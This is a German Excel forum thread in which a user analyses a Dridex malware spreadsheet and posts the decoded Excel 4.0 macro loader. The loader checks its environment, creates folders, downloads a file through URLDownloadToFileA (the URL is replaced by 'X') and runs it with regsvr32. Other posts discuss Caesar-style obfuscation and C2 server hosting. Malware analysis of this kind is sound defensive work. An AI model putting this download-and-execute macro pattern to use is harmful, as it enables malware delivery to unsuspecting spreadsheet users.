Clever-Excel-Forum

Clever-Excel-Forum > Office-Anwendungen > Excel > Dridex: VBA lesen
Normale Version: Dridex: VBA lesen
Du siehst gerade eine vereinfachte Darstellung unserer Inhalte. Normale Ansicht mit richtiger Formatierung.

Fennek

10.09.2020, 09:03
Hallo,

im Anhang befindet sich der VBA-Code und der Inhalt einiger Zellen einer xlsx-Version der Dridex-malware. Das Auslesen unter Linux mit LibreOffice kann auch einige Inhalte, z.B. Beschriftung von Shapes, nicht erkennen, so dass es keine Garantie auf Vollständigkeit gibt.

Den VBA-Code kann ich nicht entziffern, aber bei den Zellinhalten (am Ende der Datei) kann ich nicht einmal die Sprache erkennen. Könnte das Excel4Macro-Code sein? Es ist immer mögllich, dass einige Teile nur zur Verwirrung und Verschleierung eingefügt wurden.

mfg

(Ein Spezialist konnte 4 url's auslesen, aber er hat nicht beschrieben, wie das geht)
(Die Datei ist frei im Netz verfügbar, trotzdem möchte ich keine google-fähigen Informationen veröffentlichen)

ANHANG AUF WUSCH DES THREADERSTELLERS GELÖSCHT
MODERATOR

ralf_b

10.09.2020, 11:41
code obfuscation würde ich sagen.

Fennek

11.09.2020, 10:04
Hallo,

sorry, nach langer Analyse der Word-Version, habe ich bei der Excel-Version etwas die Nerven verloren.

Am späteren Abend und nach einer "Rundreise" durch die mit der malware verknüften Twitter-Accounts der Reporter habe ich dann die Lösung gefunden:

Im Gegensatz zu meinen Vorurteilen sind Excel4Macro alles andere als harmlos:

Code:
Range("A460:A464") '#### Excel4Macro DEAKTIVIEREN ####

IF(ISNUMBER(SEARCH("do",GET.WORKSPACE(1))), ,CLOSE(TRUE))
CALL("Kernel32","CreateDirectoryA","JCJ","C:\;",0)
CALL("Kernel32","CreateDirectoryA","JCJ","C:\;\'",0)
CALL("URLMON","URLDownloadToFileA", "JJCCJJ",0,"X","C:\;\'\$.",0,0)
CALL("Shell32","ShellExecuteA", "JJCCCCJ",0,"Open","regsvr32"," -s C:\;\'\$.",0,0)

Die "verschlüsselten" Texte erwiesen sich als "Caesar" mit dem Spaltenindex als Parameter.

Damit ergibt sich aus meiner Sicht ein gesellschaftliches Problem: Die malware-Autoren meinten, sehr viele urls in dieser "Loader"-Datei einbetten zu können. Auf der Basis einer Stichprobe von 1 ist zu befürchten, dass diese Annahme nicht ganz falsch ist. Es gibt sehr viele Information, von welchen Servern malware verteilt wird. Diese Server stehen auch in Ländern, die ich für seriös halte, aber das Entfernen kann trotzdem mehrere Tage dauern.

Es gibt sogar eine Liste mit den C2-Servern von Emotet für die letzen 7 Jahre und dem Status "online" bzw "offline". Dabei haben Länder in West-Europa und Nord-Amerika auch einen Anteil. Ich halte diese Liste für "staatsnah", d.h. staatliche IT-Sicherheits-Teams arbeiten dort mit. (nicht Deutschland). Der Anbieter, der clever-excel hosted, war gestern mit einem C2-Server auch aktiv dabei. Sofern ich mich nicht irre, auch in Einzelfällen beim Verteilen von malware.

Da einem Bekannten auf diese Art die Lebenversicherung gestohlen wurde, möchte ich es einmal etwas emotionaler sagen: Es ist zum k...

maninweb

11.09.2020, 11:12
Hallo,

hier noch ein bißchen Doku zu CALL: https://support.microsoft.com/en-us/offi...63d188307f
Und ein Artikel (Englisch), den Du aber vielleicht schon kennst: https://www.cybereason.com/blog/excel4.0...e-the-bits

Gruß
Clever-Excel-Forum > Office-Anwendungen > Excel > Dridex: VBA lesen